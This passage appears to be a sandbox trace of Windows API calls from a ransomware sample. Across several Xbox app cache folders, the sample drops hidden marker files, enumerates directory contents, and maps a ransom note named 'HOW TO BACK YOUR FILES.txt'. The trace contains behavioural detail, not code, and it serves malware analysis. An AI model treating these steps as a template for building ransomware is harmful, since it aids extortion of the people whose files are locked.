returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0066.153] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.154] WriteFile (in: hFile=0x228, lpBuffer=0x11cda28*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11cc9e0, lpOverlapped=0x0 | out: lpBuffer=0x11cda28*, lpNumberOfBytesWritten=0x11cc9e0*=0x3d4, lpOverlapped=0x0) returned 1 [0066.157] FlushFileBuffers (hFile=0x228) returned 1 [0066.158] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.159] CloseHandle (hObject=0x228) returned 1 [0066.159] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\Temp") returned 78 [0066.159] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.159] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x11cded0 | out: lpFindFileData=0x11cded0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x161f141, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd2084d49, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0c1c4f6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102990 [0066.159] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.159] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.159] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.159] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.159] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x11cded0 | out: lpFindFileData=0x11cded0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x161f141, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd2084d49, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0c1c4f6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.159] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.159] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.159] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.160] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.160] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.160] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x11cded0 | out: lpFindFileData=0x11cded0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0c1c4f6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0c1c4f6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0c1c4f6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.160] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.160] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.160] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x11cded0 | out: lpFindFileData=0x11cded0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0c1c4f6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0c1c4f6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0c1c4f6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.160] FindClose (in: hFindFile=0x102990 | out: hFindFile=0x102990) returned 1 [0066.160] lstrcpyW (in: lpString1=0x11ceabe, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.160] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.160] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.160] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.161] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.161] CloseHandle (hObject=0x27c) returned 1 [0066.161] CloseHandle (hObject=0x228) returned 1 [0066.161] GetCurrentThreadId () returned 0xd1c [0066.161] RtlInterlockedPopEntrySList (in: ListHead=0x122048 | out: ListHead=0x122048) returned 0x122368 [0066.161] lstrcpynW (in: lpString1=0x11cea20, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetHistory" [0066.161] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123bd8 | out: hHeap=0xe0000) returned 1 [0066.161] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122360 | out: hHeap=0xe0000) returned 1 [0066.161] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetHistory" [0066.161] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetHistory\\" [0066.161] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0066.161] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.163] WriteFile (in: hFile=0x228, lpBuffer=0x11cda28*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11cc9e0, lpOverlapped=0x0 | out: lpBuffer=0x11cda28*, lpNumberOfBytesWritten=0x11cc9e0*=0x3d4, lpOverlapped=0x0) returned 1 [0066.175] FlushFileBuffers (hFile=0x228) returned 1 [0066.176] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.177] CloseHandle (hObject=0x228) returned 1 [0066.177] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetHistory") returned 85 [0066.177] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.177] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x11cded0 | out: lpFindFileData=0x11cded0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x161f141, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd2084468, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0c1c4f6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0066.177] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.177] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.177] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.177] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.177] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x11cded0 | out: lpFindFileData=0x11cded0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x161f141, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd2084468, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0c1c4f6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.177] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.178] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.178] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.178] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.178] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.178] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x11cded0 | out: lpFindFileData=0x11cded0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0c1c4f6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0c1c4f6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0c41303, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.178] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.178] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.178] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x11cded0 | out: lpFindFileData=0x11cded0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0c1c4f6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0c1c4f6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0c41303, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.178] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0066.178] lstrcpyW (in: lpString1=0x11ceacc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.178] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.178] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.178] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.179] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.179] CloseHandle (hObject=0x27c) returned 1 [0066.179] CloseHandle (hObject=0x228) returned 1 [0066.179] GetCurrentThreadId () returned 0xd1c [0066.179] RtlInterlockedPopEntrySList (in: ListHead=0x122048 | out: ListHead=0x122048) returned 0x121f88 [0066.179] lstrcpynW (in: lpString1=0x11cea20, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCookies" [0066.179] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124758 | out: hHeap=0xe0000) returned 1 [0066.179] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121f80 | out: hHeap=0xe0000) returned 1 [0066.179] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCookies" [0066.179] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCookies\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCookies\\" [0066.179] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCookies\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" [0066.179] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\ac\\inetcookies\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.180] WriteFile (in: hFile=0x228, lpBuffer=0x11cda28*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11cc9e0, lpOverlapped=0x0 | out: lpBuffer=0x11cda28*, lpNumberOfBytesWritten=0x11cc9e0*=0x3d4, lpOverlapped=0x0) returned 1 [0066.187] FlushFileBuffers (hFile=0x228) returned 1 [0066.188] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCookies\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.188] CloseHandle (hObject=0x228) returned 1 [0066.189] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCookies") returned 85 [0066.189] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.189] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x11cded0 | out: lpFindFileData=0x11cded0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x161f141, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd2083998, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0c41303, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1026d0 [0066.189] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.189] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.189] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.189] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.189] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x11cded0 | out: lpFindFileData=0x11cded0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x161f141, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd2083998, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0c41303, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.189] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.189] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.189] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.189] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.189] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.189] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x11cded0 | out: lpFindFileData=0x11cded0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0c41303, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0c41303, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0c67541, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.189] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.189] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.189] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x11cded0 | out: lpFindFileData=0x11cded0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0c41303, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0c41303, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0c67541, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.189] FindClose (in: hFindFile=0x1026d0 | out: hFindFile=0x1026d0) returned 1 [0066.189] lstrcpyW (in: lpString1=0x11ceacc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.189] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.190] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.190] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.190] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.190] CloseHandle (hObject=0x27c) returned 1 [0066.190] CloseHandle (hObject=0x228) returned 1 [0066.190] GetCurrentThreadId () returned 0xd1c [0066.190] RtlInterlockedPopEntrySList (in: ListHead=0x122048 | out: ListHead=0x122048) returned 0x122288 [0066.190] lstrcpynW (in: lpString1=0x11cea20, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCache" [0066.190] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x119158 | out: hHeap=0xe0000) returned 1 [0066.190] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122280 | out: hHeap=0xe0000) returned 1 [0066.190] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCache" [0066.191] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCache\\" [0066.191] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0066.191] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.193] WriteFile (in: hFile=0x228, lpBuffer=0x11cda28*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11cc9e0, lpOverlapped=0x0 | out: lpBuffer=0x11cda28*, lpNumberOfBytesWritten=0x11cc9e0*=0x3d4, lpOverlapped=0x0) returned 1 [0066.195] FlushFileBuffers (hFile=0x228) returned 1 [0066.196] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.196] CloseHandle (hObject=0x228) returned 1 [0066.197] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCache") returned 83 [0066.197] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.197] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x11cded0 | out: lpFindFileData=0x11cded0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x161f141, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd2082fdf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf0c67541, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0066.197] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.197] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.197] lstrcmpiW 